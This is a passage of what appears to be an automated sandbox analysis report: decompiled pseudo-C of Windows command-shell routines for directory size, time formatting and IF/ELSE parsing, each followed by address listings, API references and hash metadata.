				_t145 =  &(__ecx[1]);
				do {
					_t78 =  *_t124;
					_t124 = _t124 + 2;
				} while (_t78 != 0);
				_t157 = _v1152;
				_t126 = _t124 - _t145 >> 1;
				_t79 = (_t124 - _t145 >> 1) - 2;
				_v1164 = _t79;
				 *_t157 = _t79;
				_t80 = GetFileAttributesW(__ecx);
				if(_t80 == 0xffffffff) {
					_push(0);
					_push(GetLastError());
					E0015C5A2(_t126);
					goto L10;
				}
				if((_t80 & 0x00000010) != 0) {
					_t129 = _t119;
					_t146 =  &(_t129[1]);
					do {
						_t83 =  *_t129;
						_t129 =  &(_t129[1]);
					} while (_t83 != 0);
					_t131 = _t129 - _t146 >> 1;
					_t84 = 0x5c;
					_push(0x2a);
					if( *((intOrPtr*)(_t119 + _t131 * 2 - 2)) != _t84) {
						 *((short*)(_t119 + 4 + _t131 * 2)) = 0;
						_pop(_t145);
					} else {
						_t145 = 0;
						_pop(_t84);
					}
					_t119[_t131] = _t84;
					 *(_t119 + 2 + _t131 * 2) = _t145;
					_t86 = FindFirstFileW(_t119,  &_v1144);
					_v1156 = _t86;
					if(_t86 != 0xffffffff) {
						_t154 = 1;
						do {
							_t131 = ".";
							_t87 =  &(_v1144.cFileName);
							while(1) {
								_t145 =  *_t87;
								if(_t145 !=  *_t131) {
									break;
								}
								if(_t145 == 0) {
									L26:
									_t88 = 0;
									L28:
									if(_t88 == 0) {
										goto L57;
									}
									_t131 = L"..";
									_t96 =  &(_v1144.cFileName);
									while(1) {
										_t145 =  *_t96;
										if(_t145 !=  *_t131) {
											break;
										}
										if(_t145 == 0) {
											L34:
											_t97 = 0;
											L36:
											if(_t97 == 0) {
												goto L57;
											}
											_t134 =  &(_v1144.cFileName);
											_t145 = _t134 + 2;
											do {
												_t98 =  *_t134;
												_t134 = _t134 + 2;
											} while (_t98 != _v1148);
											_t135 = _t134 - _t145;
											_t131 = _t135 >> 1;
											if(_t135 == 0) {
												goto L57;
											}
											if((_v1144.dwFileAttributes & 0x00000010) != 0) {
												_t99 =  *_t157;
												if(_t99 <= _t131) {
													_t99 = _t131;
												}
												 *_t157 = _t99;
												goto L57;
											}
											_v28 = 1;
											_v32 = 0;
											_v24 = 0x104;
											memset( &_v552, 0, 0x104);
											_t161 = _t161 + 0xc;
											if(E00160C70( &_v552, ((0 | _v28 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
												SetLastError(8);
												L60:
												__imp__??_V@YAXPAX@Z(_v32);
												_pop(_t131);
												L61:
												_t157 = GetLastError();
												FindClose(_v1156);
												if(_t154 != 0) {
													goto L10;
												}
												if(_t157 == 0x12) {
													goto L7;
												}
												_push(0);
												goto L64;
											}
											E00160D89(_t145, _t119);
											_t148 = _v32;
											_t138 = _t148;
											if(_t148 == 0) {
												_t138 =  &_v552;
											}
											_t159 = _t138 + 2;
											do {
												_t110 =  *_t138;
												_t138 = _t138 + 2;
											} while (_t110 != _v1148);
											_t140 = _t138 - _t159 >> 1;
											if(_t148 == 0) {
												_t148 =  &_v552;
											}
											 *((short*)(_t148 + _t140 * 2 - 2)) = 0;
											E00160CF2(_t148,  &(_v1144.cFileName));
											_t142 = _v32;
											if(_v32 == 0) {
												_t142 =  &_v552;
											}
											_t145 = _v24;
											if(E0015B89C(_t142, _v24,  &_v1160) == 0) {
												goto L60;
											} else {
												_t157 = _v1152;
												_t144 = _v1164 + _v1160;
												_t116 =  *_t157;
												if(_t116 <= _t144) {
													_t116 = _t144;
												}
												 *_t157 = _t116;
												__imp__??_V@YAXPAX@Z(_v32);
												_pop(_t131);
												goto L57;
											}
										}
										_t145 =  *((intOrPtr*)(_t96 + 2));
										_t33 = _t131 + 2; // 0x2e
										if(_t145 !=  *_t33) {
											break;
										}
										_t96 = _t96 + 4;
										_t131 = _t131 + 4;
										if(_t145 != 0) {
											continue;
										}
										goto L34;
									}
									asm("sbb eax, eax");
									_t97 = _t96 | 0x00000001;
									goto L36;
								}
								_t145 =  *((intOrPtr*)(_t87 + 2));
								_t30 = _t131 + 2; // 0x200000
								if(_t145 !=  *_t30) {
									break;
								}
								_t87 = _t87 + 4;
								_t131 = _t131 + 4;
								if(_t145 != 0) {
									continue;
								}
								goto L26;
							}
							asm("sbb eax, eax");
							_t88 = _t87 | 0x00000001;
							goto L28;
							L57:
							_t154 = FindNextFileW(_v1156,  &_v1144);
						} while (_t154 != 0);
						goto L61;
					} else {
						_t157 = GetLastError();
						FindClose(0xffffffff);
						if(_t157 == 2 || _t157 == 0x12) {
							goto L7;
						} else {
							_push(0);
							L64:
							_push(_t157);
							E0015C5A2(_t131);
							_t76 = 0;
							goto L8;
						}
					}
				}
				L7:
				_t76 = 1;
				goto L8;
			}




















































                                  0x0015b89c
                                  0x0015b8a7
                                  0x0015b8ae
                                  0x0015b8b5
                                  0x0015b8b7
                                  0x0015b8be
                                  0x0015b8c3
                                  0x0015b8c9
                                  0x0015b8cc
                                  0x0015b8cc
                                  0x0015b8cf
                                  0x0015b8d2
                                  0x0015b8d9
                                  0x0015b8e0
                                  0x00169da8
                                  0x00169da8
                                  0x0015b928
                                  0x0015b92b
                                  0x0015b938
                                  0x0015b938
                                  0x0015b8e6
                                  0x0015b8ea
                                  0x0015b8ed
                                  0x0015b8ed
                                  0x0015b8f0
                                  0x0015b8f3
                                  0x0015b8f8
                                  0x0015b900
                                  0x0015b903
                                  0x0015b906
                                  0x0015b90c
                                  0x0015b90e
                                  0x0015b917
                                  0x00169d99
                                  0x00169da0
                                  0x00169da1
                                  0x00000000
                                  0x00169da7
                                  0x0015b91f
                                  0x00169daf
                                  0x00169db1
                                  0x00169db4
                                  0x00169db4
                                  0x00169db7
                                  0x00169dba
                                  0x00169dc1
                                  0x00169dc5
                                  0x00169dc6
                                  0x00169dcd
                                  0x00169dd6
                                  0x00169ddb
                                  0x00169dcf
                                  0x00169dcf
                                  0x00169dd1
                                  0x00169dd1
                                  0x00169ddc
                                  0x00169de8
                                  0x00169ded
                                  0x00169df3
                                  0x00169dfc
                                  0x00169e28
                                  0x00169e29
                                  0x00169e29
                                  0x00169e2e
                                  0x00169e34
                                  0x00169e34
                                  0x00169e3a
                                  0x00000000
                                  0x00000000
                                  0x00169e3f
                                  0x00169e56
                                  0x00169e56
                                  0x00169e5f
                                  0x00169e61
                                  0x00000000
                                  0x00000000
                                  0x00169e67
                                  0x00169e6c
                                  0x00169e72
                                  0x00169e72
                                  0x00169e78
                                  0x00000000
                                  0x00000000
                                  0x00169e7d
                                  0x00169e94
                                  0x00169e94
                                  0x00169e9d
                                  0x00169e9f
                                  0x00000000
                                  0x00000000
                                  0x00169ea5
                                  0x00169eab
                                  0x00169eae
                                  0x00169eae
                                  0x00169eb1
                                  0x00169eb4
                                  0x00169ebd
                                  0x00169ebf
                                  0x00169ec1
                                  0x00000000
                                  0x00000000
                                  0x00169ece
                                  0x00169fb6
                                  0x00169fba
                                  0x00169fbc
                                  0x00169fbc
                                  0x00169fbe
                                  0x00000000
                                  0x00169fbe
                                  0x00169ed6
                                  0x00169edf
                                  0x00169eea
                                  0x00169eee
                                  0x00169efb
                                  0x00169f14
                                  0x00169fe1
                                  0x00169fe7
                                  0x00169fea
                                  0x00169ff0
                                  0x00169ff1
                                  0x00169ffd
                                  0x00169fff
                                  0x0016a007
                                  0x00000000
                                  0x00000000
                                  0x0016a010
                                  0x00000000
                                  0x00000000
                                  0x0016a018
                                  0x00000000
                                  0x0016a018
                                  0x00169f21
                                  0x00169f26
                                  0x00169f29
                                  0x00169f2d
                                  0x00169f2f
                                  0x00169f2f
                                  0x00169f35
                                  0x00169f38
                                  0x00169f38
                                  0x00169f3b
                                  0x00169f3e
                                  0x00169f49
                                  0x00169f4d
                                  0x00169f4f
                                  0x00169f4f
                                  0x00169f57
                                  0x00169f69
                                  0x00169f6e
                                  0x00169f73
                                  0x00169f75
                                  0x00169f75
                                  0x00169f7b
                                  0x00169f8c
                                  0x00000000
                                  0x00169f8e
                                  0x00169f8e
                                  0x00169f9a
                                  0x00169fa0
                                  0x00169fa4
                                  0x00169fa6
                                  0x00169fa6
                                  0x00169fab
                                  0x00169fad
                                  0x00169fb3
                                  0x00000000
                                  0x00169fb3
                                  0x00169f8c
                                  0x00169e7f
                                  0x00169e83
                                  0x00169e87
                                  0x00000000
                                  0x00000000
                                  0x00169e89
                                  0x00169e8c
                                  0x00169e92
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00169e92
                                  0x00169e98
                                  0x00169e9a
                                  0x00000000
                                  0x00169e9a
                                  0x00169e41
                                  0x00169e45
                                  0x00169e49
                                  0x00000000
                                  0x00000000
                                  0x00169e4b
                                  0x00169e4e
                                  0x00169e54
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00169e54
                                  0x00169e5a
                                  0x00169e5c
                                  0x00000000
                                  0x00169fc0
                                  0x00169fd3
                                  0x00169fd5
                                  0x00000000
                                  0x00169dfe
                                  0x00169e06
                                  0x00169e08
                                  0x00169e11
                                  0x00000000
                                  0x00169e20
                                  0x00169e20
                                  0x0016a019
                                  0x0016a019
                                  0x0016a01a
                                  0x0016a020
                                  0x00000000
                                  0x0016a022
                                  0x00169e11
                                  0x00169dfc
                                  0x0015b925
                                  0x0015b927
                                  0x00000000

                                  APIs
                                  • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00007FE7,00000000), ref: 0015B90E
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: AttributesFile
                                  • String ID:
                                  • API String ID: 3188754299-0
                                  • Opcode ID: a567d9146229d4b9a118d625145819d7f5b14f89fd933331fadbc38991312fd1
                                  • Instruction ID: c2d8c3ec7788dfa71370a96b516af14aa7b1f836da8ff3381deedda6d54026b6
                                  • Opcode Fuzzy Hash: a567d9146229d4b9a118d625145819d7f5b14f89fd933331fadbc38991312fd1
                                  • Instruction Fuzzy Hash: A29123729001058BCF24DF68CC456FEB7B9EF64310F5585AEE91AD7240EB329E95CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001596A0, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 237timeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 70%
                                  			E001596A0(void* __ecx, void* __edx, signed int _a4, unsigned int _a8) {
				signed int _v8;
				short _v76;
				short _v332;
				signed short _v334;
				signed short _v336;
				signed int _v338;
				signed int _v340;
				struct _SYSTEMTIME _v348;
				signed int _v352;
				intOrPtr _v356;
				void* _v360;
				struct _FILETIME _v368;
				struct _FILETIME _v376;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t58;
				char* _t67;
				signed int _t73;
				signed int _t74;
				signed int _t76;
				signed int _t79;
				signed short _t80;
				signed int _t85;
				signed int _t88;
				signed int _t92;
				signed int _t99;
				void* _t106;
				void* _t111;
				signed int _t112;
				signed int _t114;
				void* _t116;
				void* _t119;
				signed int _t121;
				signed int _t122;
				void* _t123;
				signed int _t124;
				signed int _t126;
				signed int _t127;
				intOrPtr* _t131;
				void* _t133;
				int _t134;
				void* _t136;
				signed int _t138;
				signed int _t140;
				signed int _t141;
				void* _t142;

				_t58 =  *0x17d0b4; // 0x3dd0c51d
				_v8 = _t58 ^ _t141;
				_t139 = _a4;
				_t136 = __edx;
				if(__ecx != 0) {
					E00173C49(__ecx,  &_v368);
				} else {
					GetSystemTime( &_v348);
					SystemTimeToFileTime( &_v348,  &_v368);
				}
				FileTimeToLocalFileTime( &_v368,  &_v376);
				FileTimeToSystemTime( &_v376,  &_v348);
				if(_t136 != 1) {
					__eflags =  *0x193cc9;
					if( *0x193cc9 == 0) {
						__eflags =  *0x17d0cc;
						_t67 = "a";
						_t114 = _v340 & 0x0000ffff;
						if( *0x17d0cc == 0) {
							_t67 = " ";
						} else {
							__eflags = _t114 - 0xc;
							if(__eflags < 0) {
								__eflags = _t114;
								if(_t114 == 0) {
									_t114 = 0xc;
								}
							} else {
								if(__eflags > 0) {
									__eflags = _t114;
								}
								_t67 = "p";
							}
						}
						_push(_t67);
						_push(_v338 & 0x0000ffff);
						_push(0x17f81c);
						E0016274C( &_v76, 0x20, L"%02d%s%02d%s", _t114);
						L48:
						__eflags = _t139;
						if(_t139 != 0) {
							_t130 = _a8;
							E00161040(_t139, _a8,  &_v76);
							_t116 = _t139 + 2;
							do {
								_t73 =  *_t139;
								_t139 = _t139 + 2;
								__eflags = _t73;
							} while (_t73 != 0);
							goto L6;
						}
						_t131 =  &_v76;
						_t119 = _t131 + 2;
						do {
							_t76 =  *_t131;
							_t131 = _t131 + 2;
							__eflags = _t76;
						} while (_t76 != 0);
						_t130 = _t131 - _t119 >> 1;
						_t74 = E00162616( &_v76, _t131 - _t119 >> 1);
						goto L7;
					}
					_v352 = 0;
					_t79 = GetLocaleInfoW(E001641A4(), 0x1003,  &_v332, 0x80);
					__eflags = _t79;
					if(_t79 != 0) {
						L20:
						_t80 = _v332;
						_t136 =  &_v332;
						__eflags = _t80;
						if(_t80 == 0) {
							L37:
							_t85 = GetTimeFormatW(E001641A4(), 2,  &_v348,  &_v332,  &_v76, 0x20);
							__eflags = _t85;
							if(_t85 == 0) {
								_v76 = _t85;
							}
							goto L48;
						}
						_t112 = _t80 & 0x0000ffff;
						_t121 = 0;
						__eflags = 0;
						do {
							__eflags = _t112 - 0x27;
							if(_t112 != 0x27) {
								__eflags = _t121;
								if(_t121 == 0) {
									__eflags = _t112 - 0x68;
									if(_t112 == 0x68) {
										L29:
										_t122 = 0;
										__eflags = 0;
										do {
											_t136 = _t136 + 2;
											_t122 = _t122 + 1;
											__eflags =  *_t136 - _t112;
										} while ( *_t136 == _t112);
										_t133 = _t136 +  ~_t122 * 2;
										_v360 = _t133;
										_t136 = _t133 + 2;
										__eflags = _t122 - 1;
										if(_t122 != 1) {
											L35:
											_t121 = _v352;
											goto L36;
										}
										_t123 = _t133;
										_v356 = _t123 + 2;
										do {
											_t92 =  *_t123;
											_t123 = _t123 + 2;
											__eflags = _t92;
										} while (_t92 != 0);
										_t124 = _t123 - _v356;
										__eflags = _t124;
										memmove(_t136, _t133, 2 + (_t124 >> 1) * 2);
										_t142 = _t142 + 0xc;
										 *_v360 = _t112;
										goto L35;
									}
									__eflags = _t112 - 0x48;
									if(_t112 == 0x48) {
										goto L29;
									}
									__eflags = _t112 - 0x6d;
									if(_t112 != 0x6d) {
										goto L36;
									}
									goto L29;
								}
								_t136 = _t136 + 2;
								goto L36;
							}
							_t136 = _t136 + 2;
							__eflags = _t121;
							_t121 = 0 | _t121 == 0x00000000;
							_v352 = _t121;
							L36:
							_t88 =  *(_t136 + 2) & 0x0000ffff;
							_t136 = _t136 + 2;
							_t112 = _t88;
							__eflags = _t88;
						} while (_t88 != 0);
						goto L37;
					}
					_t126 =  &_v332;
					_t134 = 0x80;
					_t138 = L"HH:mm:ss t" - _t126;
					__eflags = _t138;
					while(1) {
						_t25 = _t134 + 0x7fffff7e; // 0x7ffffffe
						__eflags = _t25;
						if(_t25 == 0) {
							break;
						}
						_t99 =  *(_t138 + _t126) & 0x0000ffff;
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						 *_t126 = _t99;
						_t126 = _t126 + 2;
						_t134 = _t134 - 1;
						__eflags = _t134;
						if(_t134 != 0) {
							continue;
						}
						L18:
						_t126 = _t126 - 2;
						__eflags = _t126;
						L19:
						__eflags = 0;
						 *_t126 = 0;
						goto L20;
					}
					__eflags = _t134;
					if(_t134 != 0) {
						goto L19;
					}
					goto L18;
				} else {
					_t127 = _v334 & 0x0000ffff;
					_t130 = 0xcccccccd * _t127 >> 0x20 >> 3;
					_push(0xcccccccd * _t127 >> 0x20 >> 3);
					_push(0x17f7fc);
					_push(_v336 & 0x0000ffff);
					_push(0x17f81c);
					_push(_v338 & 0x0000ffff);
					_push(0x17f81c);
					_push(_v340 & 0x0000ffff);
					_push(L"%2d%s%02d%s%02d%s%02d");
					if(_t139 == 0) {
						_t74 = E001625D9();
						L7:
						return E00166FD0(_t74, _t111, _v8 ^ _t141, _t130, _t136, _t139);
					} else {
						_push(_a8);
						_push(_t139);
						E0016274C();
						_t116 = _t139 + 2;
						do {
							_t106 =  *_t139;
							_t139 = _t139 + 2;
						} while (_t106 != 0);
						L6:
						_t140 = _t139 - _t116;
						_t139 = _t140 >> 1;
						_t74 = _t140 >> 1;
						goto L7;
					}
				}
			}


















































                                  0x001596ab
                                  0x001596b2
                                  0x001596b7
                                  0x001596bb
                                  0x001596bf
                                  0x00170ad6
                                  0x001596c5
                                  0x001596cc
                                  0x001596e0
                                  0x001596e0
                                  0x001596f4
                                  0x00159708
                                  0x00159711
                                  0x00170aed
                                  0x00170af4
                                  0x00170c53
                                  0x00170c5a
                                  0x00170c5f
                                  0x00170c66
                                  0x00170c84
                                  0x00170c68
                                  0x00170c68
                                  0x00170c6b
                                  0x00170c79
                                  0x00170c7b
                                  0x00170c7d
                                  0x00170c7d
                                  0x00170c6d
                                  0x00170c6d
                                  0x00170c6f
                                  0x00170c6f
                                  0x00170c72
                                  0x00170c72
                                  0x00170c6b
                                  0x00170c89
                                  0x00170c91
                                  0x00170c92
                                  0x00170ca3
                                  0x00170cab
                                  0x00170cab
                                  0x00170cad
                                  0x00170cd1
                                  0x00170cda
                                  0x00170cdf
                                  0x00170ce2
                                  0x00170ce2
                                  0x00170ce5
                                  0x00170ce8
                                  0x00170ce8
                                  0x00000000
                                  0x00170ced
                                  0x00170caf
                                  0x00170cb2
                                  0x00170cb5
                                  0x00170cb5
                                  0x00170cb8
                                  0x00170cbb
                                  0x00170cbb
                                  0x00170cc5
                                  0x00170cc7
                                  0x00000000
                                  0x00170cc7
                                  0x00170b05
                                  0x00170b1b
                                  0x00170b21
                                  0x00170b23
                                  0x00170b65
                                  0x00170b65
                                  0x00170b6c
                                  0x00170b72
                                  0x00170b75
                                  0x00170c27
                                  0x00170c43
                                  0x00170c49
                                  0x00170c4b
                                  0x00170c4d
                                  0x00170c4d
                                  0x00000000
                                  0x00170c4b
                                  0x00170b7b
                                  0x00170b7e
                                  0x00170b7e
                                  0x00170b80
                                  0x00170b80
                                  0x00170b84
                                  0x00170b9a
                                  0x00170b9c
                                  0x00170ba3
                                  0x00170ba7
                                  0x00170bb5
                                  0x00170bb5
                                  0x00170bb5
                                  0x00170bb7
                                  0x00170bb7
                                  0x00170bba
                                  0x00170bbb
                                  0x00170bbb
                                  0x00170bc4
                                  0x00170bc7
                                  0x00170bcd
                                  0x00170bd0
                                  0x00170bd3
                                  0x00170c0f
                                  0x00170c0f
                                  0x00000000
                                  0x00170c0f
                                  0x00170bd5
                                  0x00170bda
                                  0x00170be0
                                  0x00170be0
                                  0x00170be3
                                  0x00170be6
                                  0x00170be6
                                  0x00170beb
                                  0x00170beb
                                  0x00170bfd
                                  0x00170c09
                                  0x00170c0c
                                  0x00000000
                                  0x00170c0c
                                  0x00170ba9
                                  0x00170bad
                                  0x00000000
                                  0x00000000
                                  0x00170baf
                                  0x00170bb3
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00170bb3
                                  0x00170b9e
                                  0x00000000
                                  0x00170b9e
                                  0x00170b88
                                  0x00170b8b
                                  0x00170b90
                                  0x00170b92
                                  0x00170c15
                                  0x00170c15
                                  0x00170c19
                                  0x00170c1c
                                  0x00170c1e
                                  0x00170c1e
                                  0x00000000
                                  0x00170b80
                                  0x00170b25
                                  0x00170b32
                                  0x00170b37
                                  0x00170b37
                                  0x00170b39
                                  0x00170b39
                                  0x00170b3f
                                  0x00170b41
                                  0x00000000
                                  0x00000000
                                  0x00170b43
                                  0x00170b47
                                  0x00170b4a
                                  0x00000000
                                  0x00000000
                                  0x00170b4c
                                  0x00170b4f
                                  0x00170b52
                                  0x00170b52
                                  0x00170b55
                                  0x00000000
                                  0x00000000
                                  0x00170b5d
                                  0x00170b5d
                                  0x00170b5d
                                  0x00170b60
                                  0x00170b60
                                  0x00170b62
                                  0x00000000
                                  0x00170b62
                                  0x00170b59
                                  0x00170b5b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00159717
                                  0x00159717
                                  0x0015972c
                                  0x0015972f
                                  0x00159730
                                  0x00159735
                                  0x0015973d
                                  0x00159742
                                  0x0015974a
                                  0x0015974f
                                  0x00159750
                                  0x00159757
                                  0x00170ae0
                                  0x00159781
                                  0x00159791
                                  0x0015975d
                                  0x0015975d
                                  0x00159760
                                  0x00159761
                                  0x00159769
                                  0x00159770
                                  0x00159770
                                  0x00159773
                                  0x00159776
                                  0x0015977b
                                  0x0015977b
                                  0x0015977d
                                  0x0015977f
                                  0x00000000
                                  0x0015977f
                                  0x00159757

                                  APIs
                                  • GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,0017F830,?,00002000), ref: 001596CC
                                  • SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 001596E0
                                  • FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 001596F4
                                  • FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00159708
                                  • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00001003,?,00000080), ref: 00170B1B
                                  • GetTimeFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000002,?,?,?,00000020), ref: 00170C43
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: Time$File$System$FormatInfoLocalLocale
                                  • String ID: %02d%s%02d%s$%2d%s%02d%s%02d%s%02d$HH:mm:ss t
                                  • API String ID: 55602301-2516506544
                                  • Opcode ID: 46f9ff430365125e548ff78b0a91135952c9b52adb95b7ec62d9f024ff6a3a41
                                  • Instruction ID: a9c9ff83cb76e21278a5a479fa12a9b992d4f955b461da34be0c3ca47249409d
                                  • Opcode Fuzzy Hash: 46f9ff430365125e548ff78b0a91135952c9b52adb95b7ec62d9f024ff6a3a41
                                  • Instruction Fuzzy Hash: 2281D575900319DACB2A9F64CC55BFA7378EF58301F04829AE81EE7140EB309F85CB51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0015D803, Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 212COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 62%
                                  			E0015D803(void* __eax, WCHAR* __ebx, void* __ecx) {
				void* __edi;
				void* __esi;
				short _t56;
				short _t57;
				signed int _t59;
				intOrPtr* _t62;
				intOrPtr _t63;
				signed int _t66;
				signed int _t68;
				signed int _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				signed int _t76;
				void* _t81;
				signed int _t85;
				signed int _t86;
				WCHAR* _t90;
				signed int _t91;
				void* _t92;
				WCHAR* _t93;
				signed int _t100;
				WCHAR* _t104;
				void* _t105;
				void* _t110;
				void* _t114;
				signed int _t118;
				signed int _t125;
				WCHAR* _t132;
				void* _t138;
				signed int _t140;
				void* _t144;
				void* _t150;
				void* _t156;
				WCHAR* _t157;
				void* _t160;
				signed int _t162;
				signed int _t165;
				signed int _t166;
				void* _t167;
				void* _t168;
				void* _t170;
				signed int _t171;
				signed int _t173;
				void* _t174;
				signed int _t175;
				signed int _t177;
				signed int _t180;

				_t104 = __ebx;
				_t157 = 0;
				__imp___wcsicmp(L"IF/?", 0x18faa0, _t156, _t170, __ecx);
				_t186 = __eax;
				if(__eax == 0) {
					 *0x18faa4 = 0;
					_t157 = 1;
				}
				_t110 = 0x2c;
				_t171 = E0015E9A0(_t110, _t186);
				if(_t157 != 0) {
					_t56 = 0x2f;
					 *0x18faa0 = _t56;
					_t57 = 0x3f;
					 *0x18faa2 = _t57;
					 *0x18faa4 = 0;
				} else {
					E0015F030(0);
				}
				_t149 = 0x2c;
				_t59 = E0015DCE1(_t104, _t149, _t157);
				if(_t59 != 0) {
					 *(_t171 + 0x38) =  *(_t171 + 0x38) & 0x00000000;
					 *_t171 = 0x3c;
					goto L13;
				} else {
					_t160 = 0;
					if( *0x193cc9 == _t59) {
						L6:
						_t149 = 0;
						E0015F300(_t59, 0, 0, 0);
					} else {
						__imp___wcsicmp(0x18faa0, L"/I");
						if(_t59 == 0) {
							_t160 = 1;
						} else {
							goto L6;
						}
					}
					_t62 = E0015CDA2(0);
					 *((intOrPtr*)(_t171 + 0x3c)) = _t62;
					if(_t62 != 0 && _t160 != 0) {
						__eflags =  *_t62 - 0x38;
						if( *_t62 == 0x38) {
							_t62 =  *((intOrPtr*)(_t62 + 0x3c));
						}
						 *((intOrPtr*)(_t62 + 0x40)) = 2;
					}
					_t114 = 0x2c;
					_t63 = E0015DC74(_t104, _t114);
					 *((intOrPtr*)(_t171 + 0x40)) = _t63;
					if(_t63 == 0) {
						E001782EB(_t114);
					}
					if(E0015EEC8() == 0) {
						L13:
						return _t171;
					} else {
						_t66 = E0015F030(0);
						__imp___wcsicmp(L"ELSE", 0x18faa0);
						if(_t66 == 0) {
							_t118 =  *0x18fa8c +  *0x18fa8c;
							_t68 = E001600B0(_t118);
							__eflags = _t68;
							if(_t68 == 0) {
								E00179287(_t118);
								__imp__longjmp(0x18b8b8, 1);
								asm("int3");
								while(1) {
									L58:
									 *((short*)(_t149 + _t118 * 2)) = 0;
									while(1) {
										_t71 =  *(_t171 + 0x14);
										_t171 = _t71;
										__eflags = _t71;
										if(_t71 == 0) {
											break;
										}
										_t119 =  *(_t171 + 4);
										_t162 =  *(_t171 + 4);
										_t150 = _t162 + 2;
										do {
											_t72 =  *_t162;
											_t162 = _t162 + 2;
											__eflags = _t72 - _t104;
										} while (_t72 != _t104);
										_t73 = E001622C0(_t104, _t119);
										_t149 = (_t162 - _t150 >> 1) + 1;
										E00161040( *(_t171 + 4), (_t162 - _t150 >> 1) + 1, _t73);
										__eflags =  *((intOrPtr*)(_t171 + 8)) - _t104;
										if( *((intOrPtr*)(_t171 + 8)) == _t104) {
											_t149 =  *(_t171 + 4);
											_t140 = _t149;
											_t168 = _t140 + 2;
											do {
												_t75 =  *_t140;
												_t140 = _t140 + 2;
												__eflags = _t75 - _t104;
											} while (_t75 != _t104);
											_t118 = (_t140 - _t168 >> 1) - 1;
											__eflags = _t118 - 1;
											if(_t118 > 1) {
												__eflags =  *((short*)(_t149 + _t118 * 2)) - 0x3a;
												if( *((short*)(_t149 + _t118 * 2)) == 0x3a) {
													goto L58;
												}
											}
										}
									}
									_t165 =  *(_t180 - 0x228);
									_t173 =  *(_t180 - 0x224);
									__eflags = _t173 - 3;
									if(_t173 == 3) {
										_t76 =  *0x193cd4;
										 *(_t180 - 0x228) = _t76;
										goto L33;
									} else {
										_t138 = 0x10;
										_t76 = E001600B0(_t138);
										 *(_t180 - 0x228) = _t76;
										__eflags = _t76;
										if(_t76 == 0) {
											L52:
											_t104 = 1;
										} else {
											 *(_t76 + 0xc) =  *0x193cd4;
											 *0x193cd4 = _t76;
											 *(_t76 + 8) = _t165;
											 *_t76 = _t173;
											L33:
											_t166 =  *(_t165 + 0x34);
											__eflags = _t166;
											if(_t166 != 0) {
												_t175 = _t173 | 0xffffffff;
												__eflags = _t175;
												do {
													__eflags =  *(_t166 + 8) - _t104;
													if( *(_t166 + 8) != _t104) {
														goto L48;
													} else {
														__imp___get_osfhandle( *_t166);
														__eflags = _t76 - _t175;
														if(_t76 == _t175) {
															L63:
															 *(_t166 + 8) = _t175;
															goto L41;
														} else {
															__imp___get_osfhandle( *_t166);
															__eflags = _t76 - 0xfffffffe;
															if(_t76 == 0xfffffffe) {
																goto L63;
															} else {
																_t92 = E00160178(_t76);
																__eflags = _t92;
																if(_t92 == 0) {
																	_t92 = E00179953(_t92,  *_t166);
																	__eflags = _t92;
																	if(_t92 != 0) {
																		goto L39;
																	} else {
																		__imp___get_osfhandle( *_t166, _t104, _t104, 1);
																		_pop(_t136);
																		_t92 = SetFilePointer(_t92, ??, ??, ??);
																		__eflags = _t92 - _t175;
																		if(_t92 != _t175) {
																			goto L39;
																		} else {
																			E0016274C(0x193d00, 0x104, L"%d",  *_t166);
																			_push(0x193d00);
																			_push(1);
																			_push(0x40002721);
																			goto L75;
																		}
																	}
																} else {
																	L39:
																	_t136 =  *_t166;
																	_t93 = E0015DBCE(_t92,  *_t166);
																	 *(_t166 + 8) = _t93;
																	__eflags = _t93 - _t175;
																	if(_t93 == _t175) {
																		E0016274C(0x193d00, 0x104, L"%d",  *_t166);
																		_push(0x193d00);
																		_push(1);
																		_push(0x2344);
																		L75:
																		E0015C5A2(_t136);
																		 *(_t166 + 8) = _t104;
																		E0015D937();
																		goto L52;
																	} else {
																		E0015DB92( *_t166);
																		L41:
																		_t125 =  *(_t166 + 4);
																		__eflags =  *_t125 - 0x26;
																		if( *_t125 == 0x26) {
																			 *((short*)(_t125 + 4)) = 0;
																			_t149 =  *_t166;
																			_t127 = (( *(_t166 + 4))[1] & 0x0000ffff) - 0x30;
																			_t81 = E0015DBFC((( *(_t166 + 4))[1] & 0x0000ffff) - 0x30,  *_t166);
																			__eflags = _t81 - _t175;
																			if(_t81 != _t175) {
																				goto L48;
																			} else {
																				goto L76;
																			}
																		} else {
																			__eflags =  *((short*)(_t166 + 0x10)) - 0x3c;
																			_push(_t125);
